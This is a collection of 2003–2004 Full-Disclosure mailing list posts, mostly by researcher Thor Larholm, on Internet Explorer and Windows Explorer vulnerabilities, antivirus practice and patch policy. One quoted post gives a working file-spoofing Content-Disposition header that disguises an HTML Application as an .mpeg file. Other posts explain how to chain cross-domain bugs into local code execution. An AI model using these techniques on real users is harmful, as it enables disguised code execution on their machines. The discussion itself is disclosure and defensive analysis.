0.02 kroner coming up :) From: Gadi Evron [0] 2. In a broader view, notifications ARE currently the problem rather than a solution. I think we all recognize the fundamental truth that AV notifications are pure marketing. They contain no instructions on removing the virus and only serve to spread FUD. Somewhere sometime, a marketer at an AV company thought hey, let's get new customers by notifying people that send the virus!, implemented it and everybody followed suit since everybody is doing it, we might as well also. AV notifications have degenerated from a misguided assistance to become an even worse problem than the viruses they are supposed to stop. 3. I think we look at the whole problem in the wrong way, allow me to elaborate: The AV industry is built on reaction rather than prevention. Adding new signatures is still the #1 tool in the fight against malware. I couldn't agree more. We should stop wasting time on detailing the subject lines of a new virus, what P2P folder the latest worm copies itself to or how the latest Blaster variant changes spread algorithms on the second Thursday of the month (provided it's raining in spain). All of this does nothing to prevent any future reoccurences of the same threats and is mainly of academic interest - if you're writing a paper on worm propagation techniques or a book about The 1001 funniest virus subject lines. We're all curious beings, but having my mom know the subject lines of the 5 latest viruses does nothing to prevent her from opening attachments or being infected by Blaster. We need to change our mindsets fundamentally and approach these threats from a different angle. Instead of playing archeologists that are uncovering dinosaur bones and detailing their ridges we need to become bio engineers who analyze DNA mutation patterns and create strains of tomato plants that can endure cold winternights. It is essential that we invest serious time and money into analyzing and matrixing the common attack, spread and infection vectors of the threats that our corporate networks and public infrastructure encounter, and that we use that knowledge to create targetted counteractions and proactive theat mitigations that can hinder the spread or impact of generic types of threats - in advance. This is not just a philosophy but a viable approach to applicable crafting. We at PivX Solutions have been preaching Proactive Threat Mitigation for quite some time now. I have been speaking about it at conferences (blame canada), the panel members understood it when we explained it at the first National Cyber Security Summit and we integrated our initial efforts into Qwik-Fix which prevented dozens of threats in Q4 2003 (MiMail,lots of IE exploits,etc). I think we can all get lost in specifics from time to time, which is why it is important to remember that real security is all about risk management - how much time and money do we want to invest in lowering the inherent risk to an acceptable level? It is only when we start diverting those resources away from reactive solutions, such as antivirus that have not hindered any major virus outbreak but even created the far worse problem of AV notifications, and towards proactive appliances and proper risk management that we can minimize our risk and shorten our window of exposure to threats. With spam and mass mailers clogging the tubes, causing us all to waste money on bigger tubes, as well as our time dealing with the annoyance (more money), shouldn't the problem be solved there (at the main tubes themselves) rather than at the end user's desktop? They are right, it isn't currently demanded of them. ISPs and peering points should seriously consider the development and implementation of technologies that can unintrusively and anonymously detect threats and filter packets that meet certain risk criterias, before governmental agencies wake up and start addressing the issue by regulations and law that will inevitably limit their control of private property. [0] original post http://www.securityfocus.com/archive/1/352406/2004-02-02/2004-02-08/0 Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6
You're not very detailed about what happens behind the curtain, so here goes :) When an HTTP request returns its data, IE tries to determine the MIME type based on several factors [0]. In this case, IE determines that it cannot render the data as HTML since there is a Content-Disposition header - Content-Disposition is used whenever you e.g. output a binary file from a serverside script and want the filename to be displayed as ProjectScope.doc instead of download.php (your scripts name). The Content-Disposition HTTP header itself is not to blame, it is a standard MIME header from RFC 1806 that has been widely implemented in all browsers precisely to allow arbitrary filenaming. Since IE cannot display the data itself, it displays the Open/SaveAs dialog box so that the user can decide. The %2E in the filename is URL decoded and displayed as a . (dot) in the dialog. This URL decoding should simply not be performed as we are dealing with a file dialog and not a URL dialog, if %2E had not been decoded we would not be having this issue. Whatever action the user takes is then handled by Windows Explorer, we are now no longer dealing with IE. Windows Explorer determines what application to open the data with based on lesser rules than Internet Explorer, for one it does not look at the Content-Type header since it does not know about it. The first step of action is to compare the file extensions, only in the case of an unknown file extension does Windows Explorer perform its magic filetype guessing by inspecting the files content. The file extension in Windows is no longer limited to 3 characters, though historical reasons have kept most application extensions confined to these. Windows Explorer parses the filename, excluding its path, and determines that the file extension is everything following the last . (dot) character, in this case .{GUID}%2Efunny.mpeg. Common extensions are either a set of printable characters or a GUID, with the latter having priority over the former. After this, a lookup is performed in the registry for HKCR\CLSID\.GUID and HKCR\.EXT, with EXT being the file extension that we discovered and GUID the CLSID we found, and a match is found for the GUID prior to the entire file extension. The GUID points at HTML Application which points at MSHTA.EXE, which is then used to display the data. As with the .Folder issue, this definitely eases social engineering. Internet Explorer should not URL decode strings for file dialogs and Windows Explorer should not give precedence to CLSID's. [0] http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_ a.asp Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net - Original Message - From: [EMAIL PROTECTED] [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, January 27, 2004 9:28 AM Subject: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6 Tuesday, January 27, 2004 Trivial file spoofing in Internet Explorer 6.0.2800.1106 and all of 'its' patches to date on WIN XP [probably others]: Content-Disposition: attachment; filename=malware.{3050f4d8-98B5- 11CF-BB82-00AA00BDCE0B}fun_ball_gites_pie_throw%2Empeg Absolute bare minimum working demo [perhaps even feeble] as we are absolutely confident the self-appointed resident gooroo will be along shortly handing out packets of two cents to everyone thus saving us the effort to illustrate in even greater detail to those lacking imagination: http://www.malware.com/gooroo.html End Call -- http://www.malware.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows XP Explorer Executes Arbitrary Code in Folders
I just sent this to the other lists: Why don't we call a spade a spade? You renamed an HTML file from My Pics.html to My Pics.Folder, it's still an HTML file and not a folder. In fact, except for the changed file extension this is simply just a repeat of your previous post, Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV, except that the .Folder file extension is new to Windows XP and makes the file have a folder icon. When you open any file regardless of extension, Explorer tries to find the proper application to open the file with. This involves inspecting the first section of the files content and comparing it to a list of known signatures. You can read about MIME Type Detection in Internet Explorer at http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp We already know that opening HTML files from the My Computer zone is equivelant to opening an EXE file, given the executional rights provided by the zone. The only solution to this is to lock down the My Computer zone which I have been trying to advocate for some time now and Microsoft has now promised to do in Service Pack 2 for Windows XP. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net - Original Message - From: JacK [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, January 26, 2004 4:54 AM Subject: [Full-Disclosure] Windows XP Explorer Executes Arbitrary Code in Folders Hello, http://www.securitytracker.com/alerts/2004/Jan/1008843.html -- JacK ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Outlook Express - is this possible?
From: Nick FitzGerald [EMAIL PROTECTED] Gregh [EMAIL PROTECTED] wrote: I believe an exploit cropped up within the last 12 months or so for OE (version unknown) where the user has preview pane OFF and receives an email that he doesn't actually double click on to open. However, in deleting it, the user either web bugs himself or puts some sort of exploit in. There was an exploitable buffer overflow in a date handling routine in some .DLL (MSHTML.DLL ???) that OE used for its date functions. I have a feeling that was closer to two years ago, but have not bothered to search the archives to check... It was almost 4 years ago, roughly 3½ to be exact, on July 18 2000. Microsoft Outlook / Outlook Express GMT Field Buffer Overflow Vulnerability http://www.securityfocus.com/bid/1481 Details in original post: http://www.securityfocus.com/archive/1/70543 You just had to download the email to be exploited. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
From: morning_wood [EMAIL PROTECTED] running malware.html locally does produce the desired results, but then again... The exploit is intended and created to be run locally from a local security zone - getting to a local zone in the first place requires other vulnerabilities. i can get any html to execute locally calling a remote location for the code, as long as its run from the local machine. There are several steps involved in most of all IE command execution exploits, some of these involve downloading and executing a file once you are already in a local security zone. What http-equiv did was to simplify that part of the process by using the Shell.Application object. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] 949-231-8496 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Comments on 5 IE vulnerabilities
irresponsible and jeopardizes the security of the Internet as a whole. References: [0] Qwik-Fix(r) http://www.pivx.com/qwikfix/ [1] Description of Internet Explorer Security Zones Registry Entries http://tinyurl.com/ubfq [2] Post by Liu Die Yu http://tinyurl.com/x8qx Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] 949-231-8496 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Internet Explorer and Opera local zone restriction bypass
From: Paul Szabo [mailto:[EMAIL PROTECTED] Storing in an unpredictable location might help. Obfuscation does not: instead of setting a cookie of BadThing, the attacker could set one that will become BadThing. The need to reverse-engineer the obfuscation, and details like possible character sets, are a minor hindrance only. Security by obscurity does not work. If you had followed the debate in detail, you would have seen that there are several aspects to this problem. First you have to store defined content in a known location, then you have to load a locally residing file in a window object, then you have to use another vulnerability to change security zone and then you have to convince IE to render the stored content as HTML. Flash can remove the first and latter, and there is absolutely no reverse-engineering that will convince IE to render a BAE-64 encoded string as HTML. Loading a locally residing file in a window object brings nothing new into the world of IE exploits, and after that you STILL have to rely on yet another cross-domain vulnerability before all of this can be exploited. There is no obscurity being promised here, just an additional layer of security - encoding and decoding data when it is being stored to and read from permanent storage by Flash. Obscurity by security would only have been the case here if the data that Flash stores was sensitive or private, but it is not - all we want is to avoid having Flash used as an automated transport mechanism of data from the Internet Zone to any local security zones. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher Get our research, join our mailinglist - http://pivx.com/larholm/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Sunncomm backs down from shift key prosecution
http://www.theinquirer.net/?article=12041 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Verisign fighting back at ICANN
So now Verisign wants to protect your privacy .. and I've got a bridge or an Eiffel Tower to sell, if you're interested. According to Verisign, ICANN is an organization whose sole existance seems to be to invade your privacy and spam you to death. http://www.verisign.com/corporate/news/2003/pr_20030930.html QUOTES Network Solutions® Launches Internet Privacy Web Site Currently, the Internet Corporation for Assigned Names and Numbers (ICANN), the non-profit organization formed to assume responsibility for the domain name system management, requires all domain name holders to provide accurate contact information-name, phone number, mailing address, and e-mail address-as part of the public WhoIs database, allowing anyone to look up this information as it relates to a particular domain name. Network Solutions is working with various industry and policy organizations to minimize consumers' risk of having their personal data exploited. By visiting http://www.internetprivacyadvocate.org, consumers will find a variety of steps they can take to protect their privacy, reduce SPAM and protect their domain name registration(s) from hijacking and unauthorized transfers. /QUOTES Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher http://pivx.com/larholm/unpatched/ - Unpatched Internet Explorer Vulnerabilities ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Half-Life 2 source code stolen through IE exploit
http://www.halflife2.net/forums/showthread.php?s=e6e7d0ce0abe19997425ef50fa7fe1dfthreadid=10692 Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher http://pivx.com/larholm/unpatched - 31 Unpatched IE Security Vulnerabilities ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Exploiting Multiple Flaws in Symantec Antivirus 2004 for Windows Mobile (fwd)
-- Forwarded message -- From: [EMAIL PROTECTED] Subject: [Full-Disclosure] Exploiting Multiple Flaws in Symantec Antivirus 2004 for Windows Mobile Vulnerability #2: The Virus scanner does not appear to work at all! Like any antivirus scanner, Symantec detects the Eicar test virus (eicar.exe or eicar.txt). At least, at first glance it appears to detect it. However, you can easily defeat this by adding a few bytes of random text before or after the Eicar string. For example, if you use a hex/text editor to add a few random bytes of text before and after the string, then Symantec won't detect it! However, other AVs easily detect it, as they should. An AV scanner should be able to detect a byte stream anywhere in the file, but Symantec is easily bypassed with this rudimentary trick. The discussion of when to detect the EICAR test virus has been long, heated and on-going, but a few simple facts remain that we can quote directly from EICAR themselves. From http://www.eicar.org/anti_virus_test_file.htm we can read: Any anti-virus product that supports the EICAR test file should detect it in any file providing that the file starts with the following 68 characters, and is exactly 68 bytes long The first 68 characters is the known string. It may be optionally appended by any combination of whitespace characters with the total file length not exceeding 128 characters. The only whitespace characters allowed are the space character, tab, LF, CR, CTRL-Z. The test string has to be at the start of the file and you're only allowed to append the above whitespace characters after the end of the test string, up until a file length of 128 characters (60 whitespace characters). Since you added random bytes of text, which are not whitespace, at both start and end, your file was no longer the EICAR test virus file. We can argue from this day to the heat death of the sun about whether the heurestic engine in the AV product should have caught these variations and whether that engine might deliberately not check the EICAR test virus for variations, but only EICAR and the specific AV vendors can provide their views on why they choose to do as they did. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher http://www.pivx.com/larholm/unpatched - Unpatched IE vulnerabilities ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Symantec wants to criminalize security info sharing
I sincerely hope this is a gross misquote. You can't have any kind of research, whether it's security research online or academic research offline of any kind, without the very likely potential of bad guys having access to the same information and papers you release. Following through on this would be equal to outlawing any kind of university research that could be used by 'bad guys', whatever form those might currently be - in effect, shutting down any kind of research. It's a slippery slope leading to chaos, and I doubt John Schwarz realize the implications of his suggestion. This would effectively outlaw the entire private security industry and leave it in the buraucratically impaired hands of the exempted government to secure any kind of american software. I guess a few of the big players, such as Symantec, could be gradually incorporated in those governmental efforts, at the sacrifize of independent research. This would undermine and endanger software security more than any effort displayed so far by the 'bad guys'. On the positive side, it would at least weaken the monopoly of Microsoft severely by forcing the rest of the world to no longer use american software due to its inherent insecurities caused by a lack of independent security research. I doubt most of us realize he implications already caused by having those suggestions raised at a House Committee, not too many steps away from becoming part of new proposals. You should never let your fear outconquer your logic, it will only produce well intended but damaging results. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher -Original Message- From: Richard M. Smith [mailto:[EMAIL PROTECTED] Sent: Thursday, September 11, 2003 6:47 AM To: [EMAIL PROTECTED] COM Subject: Symantec wants to criminalize security info sharing Hi, Here's an interesting quote from John Schwarz, the COO of Symantec, in a Wired.com article from today: Just Say No to Viruses and Worms http://www.wired.com/news/infostructure/0,1377,60391,00.html But perhaps the most controversial suggestion came from John Schwarz, president and COO of antivirus firm Symantec, who called for legislation to criminalize the sharing of information and tools online that can be used by malicious hackers and virus writers. As we all know, when it comes to discussing information about computer security vulnerabilities, it is difficult to separate security uses of this information and hacking uses of the same information. For example, if Symantec were to get this law passed, are they prepared to see their employees who work on the Bugtraq email list go to jail? ;-) Richard M. Smith http://www.ComputerBytesMan.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Computer Sabotage by Microsoft
Automatic system updates are nothing new, we see it all the time with antivirus software. Given that the enduser has agreed for his AV to be updated automatically, none of us see any moral, ethical or legal implications with that scenario. The legality of this in regards to your XBox all boils down to whether you have given sufficient permission for maintenance installations on your system. Could you have given permission in any of the EULA or shrinkwrap licenses for your Xbox itself? (Did you read any of them?). Did you give permission for this as part of your Xbox-live subscription? If so, is that license valid? European courts generally think less of shrinkwrap licenses, and most paragraphs in them need to be reasonably valid and not cause excess harm or disstress to the enduser who may not be fully aware of the extent of the license he is agreeing to. So was this computer sabotage or the fulfillment of a service agreement between you and the vendor? I can see how this specific update might not benefit you tremendously personally, given that you, like many others who see the Xbox as a cheap server paid partly by Microsoft, have come to expect and depend on this particular vulnerability to exist, but the fact remains that this is an identified security vulnerability that disrupts the ordinary privilege handling of the system, in particular to the executing of unsigned code. We may disagree with Microsoft on whether only signed code should be allowed to execute on the Xbox, but that is a completely different discussion. The crux here is with the method of delivery. One thing is sure, we will see a greater level of automation for patch management in the future. I can reasonably imagine the default installation of Longhorn to automatically download and install critical security updates, and given an agreement like we already have with most AV software I see no problems in that. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher -Original Message- From: Stefan Esser [mailto:[EMAIL PROTECTED] Sent: Thursday, September 11, 2003 11:31 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Computer Sabotage by Microsoft Hi, well it finally happened. I came back home after work, connected my XBOX to the internet and went into the XBOX-Live menu configuration. Well what happened. The XBOX started automaticly downloading the new crappy XBOX-Live dashboard, which is of course fixed. This is IMHO an act of computer sabotage. I have never allowed MS to modify my dashboard or to auto update my dashboard. Is any lawyer on the list who can point me to the right paragraphs? I do not believe this computer sabotage is legal in any european country. Yours, Stefan Esser -- -- Stefan Esser [EMAIL PROTECTED] e-matters Security http://security.e-matters.de/ GPG-Keygpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69 Key fingerprint B418 B290 ACC0 C8E5 8292 8B72 D6B0 7704 CF6C AE69 -- Did I help you? Consider a gift: http://wishlist.suspekt.org/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
The new addition here is abusing how you are able to load a ressource file, residing in a local security zone, into a window object. Service Pack 1 for IE6 did a lot to deter this on most regular window objects, but should have extended that effort to searchpanes as well. Seeing as the content of a search pane can be any registered COM extension to IE, perhaps more should be done to completely separate these from the reach of ordinary scripting. Combining the mediabar ressource loading with the file-protocol proxy demonstrates just how effectively one can combine several vulnerabilities to achieve a higher level of automation in planting and executing files. The media bar ressource loading, and any other ressource loading technique, can be combined with any other cross-domain scripting vulnerability to achieve the same result. We will definitely see more combinatorial vulnerabilities in the time to come. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher http://www.pivx.com/larholm/unpatched - Unpatched IE vulnerabilities - Original Message - From: jelmer [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Thursday, September 11, 2003 3:31 PM Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code Internet explorer 6 on windows XP allows exection of arbitrary code DESCRIPTION : Yesterday Liu Die Yu released a number series of advisories concerning internet explorer by combining on of these issues with an earlier issue I myself reported a while back You can construct a specially crafted webpage that can take any action on a users system including but not limited to, installing trojans, keyloggers, wiping the users harddrive etc. snip http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Liu Die Yu findings verified, details
Some of you may find that Lius webpage at safecenter.net/liudieyu is inaccessible - this is caused by DNS problems. My USA based machines resolve safecenter.net to 64.85.73.31 which doesn't know about any liudieyu, while my EU based machines resolve safecenter.net to 66.70.10.15 where you can find his site. Interested people should change their hosts file. Since Liu is testing on IE6 Gold (6.0.2600..xpclnt_qfe.021108-2107), some of the vulnerabilities he has found are long patched, while others still exist in IE6 SP1. Some are patched at an unknown time without notice in any security bulletin, others are explicitly patched by the latest cumulative IE patch, MS03-032, which can be found at http://www.microsoft.com/technet/security/bulletin/MS03-032.asp Works: == WsOpenFileJPU, cross-domain scripting HiJackClick: 1+1=2, pointing mouseclicks on non-IE windows, adding to favorites NAFjpuInHistory, cross-domain scripting WsFakeSrc, cross-domain scripting NAFfileJPU, cross-domain scripting BackMyParent2:Multi-Thread version, cross-domain scripting RefBack, cross-domain scripting Doesn't work: = Findeath, patched by MS03-032 LinkillerJPU, patched by MS03-032 WsBASEjpu, specifically patched by MS03-032 BodyRefreshLoadsJPU WsOpenJpuInHistory The impact of the working cross-domain scripting vulnerabilities is known for ages, cookie theft, identify theft, stealing sensitive information such as banking data and, once you get a window object pointed at a local zone, local file reading and command execution. Hijacking mouse events for IE and routing them to non-IE/system windows is sure to reveal several new vulnerabilities or variations in the time to come. With these 7 new, the total number of publicly known unpatched vulnerabilities in IE is now at 30: http://www.pivx.com/larholm/unpatched/ Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MS03-032 Patch Updated or NOT ?
The bulletin is updated, not the patch. From the Technical Details: Microsoft is investigating these reports and will re-issue this bulletin with an updated patch that corrects these problems. /Thor Quoting Elv1S [EMAIL PROTECTED]: on MS website, the security bulletin MS03-032 was updated on sept 8 : V1.3 (September 8, 2003): Added information regarding reports that the patch provided does not properly correct the Object Type Vulnerability (CAN-2002-0532) But after applying the patch, rebooting - and making a test on k-otik : http://www.k-otik.com/MS03-032-TEST/ http://www.k-otik.com/MS03-032-TEST2/ i'm still vulnerable !!! So updated or not ?? - Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032
Updated antivirus will only catch specific instances of POC code, not any actual reallife exploitation which easily differ significantly in footprint and signature. It's been a constant nuisance the last few years that whenever you release any kind of POC the AV vendors will label it as a virus and have their customers feel safe whenever they try to demonstrate publicly available POC code, while still doing nothing to hinder exploitation of the actual vulnerability. AV vendors should realize that their approach to security often will lead to greater insecurity, I have no count of the number of people writing me and telling me they would not install a potentially systemdamaging patch since my public POC didn't work anyway on their system because of their superior AV product. Out of sight, out of mind.. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Monday, September 08, 2003 12:17 PM Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Updated antivirus software should catch this exploit and prevent any application from being launched. We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/ Andrew Becker C.H. Mortgage, D.R. Horton Phoenix IT/MIS Department Phone: (866) 639-7305 Fax: (480) 607-5383 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: [tool] the new p0f 2.0.1 is now out
Well, there will have to be SOME packets entering your network, they will just be indistinguishable from regular traffic. If you wanted to detect a passive OS fingerprinting, you might want to test derivations from ordinary patterns of regular traffic, such as a user constantly requesting the same HTTP ressource or constantly trying to send the same ICMP packets. You won't be able to detect a pOf scan with some static ruleset, but from the patternbreaking actions of a user trying to generate lots and lots of legitimate traffic. This would likely become easier if pOf was used as part of some larger toolset. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher - Original Message - From: Andreas Gietl [EMAIL PROTECTED] Sent: Thursday, September 04, 2003 9:43 PM Subject: Re: [Full-Disclosure] Re: [tool] the new p0f 2.0.1 is now out On Thursday 04 September 2003 20:19, thetic wrote: it i a passive scan-tool! you can't detect the scans because there are no packets going to you network. Question concerning the the POF, how can we setup a IDS to detect a POF scan. umer ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: [Full-Disclosure] 5 Microsoft Security Bulletin´s in one day ...
From: daniel uriah clemens [EMAIL PROTECTED] Not all of these are critical! snip Only one of these has been labeled critical. See my other post on the ratings of these, I definitely disagree. I don't really see the hype. Neither do I, I just think Peter was happy to see MS releasing multiple advisories on the same day as opposed to spewing them out during a week or two like they usually do with 5 advisories. Thor ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] FW: Microsoft Security Update
I see a trend going on here, Word, Office, Office, Office and Office. I guess Office has been overdue in regards to security bulletins lately :) MS03-034 (NetBIOS information disclosure) gets a rating of Low, even though Blaster showed us just how many Windows installations run with all ports accessible. It's surprising that MS03-035 (circumventing Office Macro security) and MS03-036 (BO in WordPerfect Converter) got ratings of Important rather than Critical, I guess the bulletins are waiting for some autoamtic exploit to surface before revision. At least MS03-037 (VBA code execution) got a proper Critical rating. MS03-038 (code execution in Access Snapshot Viewer, an ActiveX control) got a rating of Moderate for webpage based exploits but completely forgets to mention HTML email. Lots of different ratings and lots of details to consider before system administrators can decide when to apply these patches, but we really want simplicity over complexity. I would still prefer 2 ratings instead of 4, Apply Now or Apply Later - with the latter heading for the bi-weekly patch job. Let's face it, rolling out patches in a big corporation on an almost daily basis is just not very effective or economical. Which leads to the positive side, it is definitely great to see Microsoft releasing 5 vulnerabilities in a single day, rather than releasing a new every other day. They must have listened to the feedback from administrators who tired of inefficient and constant patch jobs, and should definitely adhere to this practice in the future. It may be a small step in optimizing the entire patch process, but it's a positive trend. If there is anything we have learnt in the months behind us it is that producing patches is the least of our worries in security, getting administrators and endusers to actually apply those patches is an entirely different ballgame. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher -Original Message- From: Microsoft [mailto:[EMAIL PROTECTED] osoft.com] Sent: 3. september 2003 23:46 To: [EMAIL PROTECTED] Subject: Microsoft Security Update -BEGIN PGP SIGNED MESSAGE- THE MICROSOFT SECURITY UPDATE NEWSLETTER September 3, 2003 The Microsoft Security Update Newsletter for home users and small businesses provides information on security-related updates to Microsoft(R) products, as well as virus alerts and resources for more information on security issues. You have received this update as a subscriber to the Microsoft Security Update Newsletter. To cancel your subscription, follow the instructions at the bottom of this page. __ SECURITY BULLETIN MS03-034 Security Update for Microsoft Windows http://go.microsoft.com/?linkid=237617 SEVERITY Low WHY WE ARE ISSUING THIS UPDATE A security issue has been identified in Microsoft Windows(R) that could allow an attacker to see information in your computer's memory over a network. You can help protect your computer by installing this update from Microsoft. MICROSOFT PRODUCTS AFFECTED BY THIS UPDATE Windows NT(R) Server 4.0 Windows NT Server 4.0 Terminal Server Edition Windows 2000 Windows XP Windows Server(TM) 2003 __ SECURITY BULLETIN MS03-035 Security Update for Microsoft Word http://go.microsoft.com/?linkid=237618 SEVERITY Important WHY WE ARE ISSUING THIS UPDATE An identified security issue in Microsoft Word(R) could allow an attacker to compromise a Microsoft Windows-based system and then take a variety of actions. For example, an attacker could read files on your computer or run programs on it. By installing this update, you can help protect your computer. MICROSOFT PRODUCTS AFFECTED BY THIS UPDATE Word 97, 98(J), 2000, and 2002 Works Suite 2001, 2002, and 2003 __ SECURITY BULLETIN MS03-036 Security Update for Microsoft Office http://go.microsoft.com/?linkid=237619 SEVERITY Important WHY WE ARE ISSUING THIS UPDATE An identified security issue in Microsoft Office could allow an attacker to compromise a system using Microsoft Office and then take a variety of actions. For example, an attacker could read files on your computer or run programs on it. By installing this update, you can help protect your computer. MICROSOFT PRODUCTS AFFECTED BY THIS UPDATE Office 97, 2000, and XP Word 98(J) FrontPage 2000 and 2002 Publisher 2000 and 2002 Works Suite 2001, 2002, and 2003 __ SECURITY BULLETIN MS03-037 Security Update for Microsoft Visual Basic for Applications http://go.microsoft.com/?linkid=237620 SEVERITY Critical WHY WE ARE ISSUING THIS UPDATE An identified security issue in Microsoft Visual Basic(R) for Applications could allow an attacker to compromise a Windows-based system and then take a variety of actions. For example, an attacker could read files on your computer or run programs
Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
From: Thor Larholm [EMAIL PROTECTED] Email is inherently unreliable communication, you should never base the security of your organization on it. Before someone else corrects me, let me do it myself :) Of course, since we (TINW) do base a lot of our organization on email being readily available it all turns out to be yet another element of risk analysis. Email is sufficiently reliable for us to trust it, despite that most people fail to question the authenticity of systemcritical notifications. Thor ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
From: Irwan Hadi [EMAIL PROTECTED] I believe that for infosec stuffs, the faster information being distributed/sent is the better. Late putting patch just because the information come almost 1 hour later after it is sent might be catastropic. Email is inherently unreliable communication, you should never base the security of your organization on it. Thor ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Need contact in the BTOPENWORLD.COM securit y department
